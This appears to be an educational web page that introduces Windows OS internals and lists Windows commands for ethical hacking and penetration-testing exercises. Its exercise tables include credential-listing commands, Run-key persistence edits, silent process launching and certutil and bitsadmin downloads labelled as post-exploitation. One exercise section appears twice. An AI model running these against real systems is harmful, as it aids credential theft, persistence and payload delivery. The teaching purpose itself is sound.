Home Curriculum What is OS Windows OS Exercise Week2-Lab Week3 Assignment Week4-Lists Quiz-1000MCQ Week5-Dict Week6-Tuples Week7-Sets Week8-Functions Week9-Applications Week10-OOPS Week11-OOPS-use Week12-Inheritance

What is Windows OS

      
          Step 1: What is Windows OS?
Windows is an Operating System developed by Microsoft.

It controls hardware (CPU, memory, storage) and lets users run software.

Versions include: Windows 7, 8, 10, 11, and Windows Server editions.

✅ In hacking, Windows is important because:

It's the most common OS in businesses.

Many attacks specifically target Windows vulnerabilities.

Windows Architecture Overview

      
          Step 2: Windows Architecture Overview
Understand the layers that make Windows work:

Layer	Description
User Mode	Where applications (like browsers, Word) run.
Kernel Mode	Where Windows controls memory, hardware, and processes.
Hardware Layer	Physical parts (CPU, RAM, Disk Drives).

Important Windows Components to Know

      
          Step 3: Important Windows Components to Know
⚡ 1. File System (NTFS)
NTFS (New Technology File System) is the main system for storing files.

Supports permissions, encryption, and file compression.

⚡ Hackers often exploit misconfigured file permissions.

⚡ 2. User Accounts & Permissions
Windows uses accounts: Admin, Standard User, Guest.

Accounts belong to groups (Administrators, Users, Guests).

Access Control Lists (ACLs) decide who can read/write files.

⚡ Privilege Escalation often involves mismanaged permissions.

⚡ 3. Processes and Services
Processes: Programs running (visible like Chrome, hidden like system tasks).

Services: Special background processes (like print spooler, update services).

View them in Task Manager or using services.msc.

⚡ Hackers sometimes target vulnerable services to gain access.

⚡ 4. Registry
A giant database where Windows stores system settings and application configurations.

Accessed using regedit.

Common hacking

Basic Windows Commands for Ethical Hackers

      
          Step 4: Basic Windows Commands for Ethical Hackers
Here are essential command-line tools you must learn:


Command	Purpose
ipconfig	View network IP settings.
net user	See user accounts.
tasklist	List running processes.
netstat	View active network connections.
wmic	Interact with system info (Windows Management Instrumentation).
reg query	Access Registry entries.
sc query	View running services.
⚡ Command line skills are critical for silent and effective hacking.

Common Windows Vulnerabilities

      
          Step 5: Common Windows Vulnerabilities
Some famous types of attacks on Windows systems:

Unpatched Systems: Missing security updates.

Weak Passwords: Easily cracked admin accounts.

Misconfigured Services: Services running with too many privileges.

Insecure Registry Settings: Dangerous autorun programs.

DLL Hijacking: Loading fake system files to gain access.

✅ Always research the latest CVEs (Common Vulnerabilities and Exposures) related to Windows.

Windows Networking Basics

      
          Step 6: Windows Networking Basics
Windows uses SMB protocol (important in file sharing and attacks like WannaCry ransomware).

RDP (Remote Desktop Protocol): Allows remote login — a common target for attackers.

Active Directory: Centralized user and computer management for organizations.

⚡ Knowing these helps you test company networks and detect security weaknesses.

Hands-On Practice for Students

      
          Step 7: Hands-On Practice for Students
Set up a Windows 10 VM using VirtualBox or VMware.

Play with:

Task Manager

Command Prompt (cmd.exe)

PowerShell

Services and Registry Editor

Install Sysinternals Suite (Microsoft’s free toolkit for deep system exploration).

Exercises I (For Students)

      
          ✅ Windows Commands for Ethical Hacking & Penetration Testing
⚡ 1. System Information & Enumeration

Command	Purpose
systeminfo	Displays OS version, patches, and hardware info
hostname	Shows the computer’s name
whoami	Displays current logged-in user
echo %username%	Shows the current user's name
net user	Lists all users on the system
net user 	Displays detailed info about a specific user
net localgroup	Shows local groups
net localgroup administrators	Lists members of the admin group

Exercises II (For Students)

      
          ✅ 2. Network Reconnaissance

Command	Purpose
ipconfig /all	Shows IP, MAC, and DNS info
ping 	Tests if a host is reachable
tracert 	Traces route packets take to a host
netstat -ano	Lists active connections with PIDs
arp -a	Shows ARP table (IP ↔ MAC)
route print	Displays routing table
nslookup 	DNS info and lookups

Exercises III (For Students)

      
          ✅ 3. File System & Directory Access

Command	Purpose
dir /s /b	Lists files and folders recursively (bare format)
attrib -h -s	Reveals hidden/system files
type 	Displays contents of a text file
findstr  	Searches for specific content in a file

Exercises IV (For Students)

      
          ⚙️ 4. Password & Credential Dumping

Command	Purpose
net accounts	Shows password policy
runas /user:Administrator cmd	Attempts to run as another user
cmdkey /list	Lists stored credentials
vaultcmd /listcreds	Lists credentials stored in Credential Manager

Exercises V (For Students)

      
          ⚙️ 5. Service & Process Inspection

Command	Purpose
tasklist	Lists all running processes
taskkill /PID  /F	Force kills a process
sc query	Lists all running services
sc qc 	Displays config for a service

Exercises VI (For Students)

      
          ⚙️ 6. Persistence & Backdoor (For Awareness in Pentesting)

Command	Purpose
schtasks /query /fo LIST /v	Shows scheduled tasks
reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run	Shows programs set to auto-run
wmic startup list full	Lists startup programs
wmic process call create ""	Executes a command silently

Exercises VII (For Students)

      
          ⚙️ 7. Windows Registry & Autorun Paths

Command	Purpose
reg query HKCU	Queries current user registry keys
reg add / reg delete	Add or remove registry keys (used in persistence)

Exercises VIII (For Students)

      
          ⚙️ 7. Windows Registry & Autorun Paths

Command	Purpose
reg query HKCU	Queries current user registry keys
reg add / reg delete	Add or remove registry keys (used in persistence)

Exercises IX (For Students)

      
          ✅ 8. Drive & Shared Resource Enumeration

Command	Purpose
net share	Lists shared folders
net use	Lists mapped network drives
wmic logicaldisk get caption,description,filesystem	Lists drives and formats

Exercises X (For Students)

      
          ✅ 9. Scripting & File Transfers (Post-Exploitation)

Command	Purpose
certutil -urlcache -split -f  file.exe	Download file from URL (native tool)
bitsadmin /transfer myDownloadJob /download /priority normal  	Another way to download files

Exercises XI (For Students)

      
          ✅ 10. Useful PowerShell Commands

Command	Purpose
Get-LocalUser	Lists local user accounts
Get-LocalGroupMember -Group \"Administrators\"	Lists admin group members
Get-Process	Lists all processes
Invoke-WebRequest 	Downloads files (PowerShell equivalent to curl)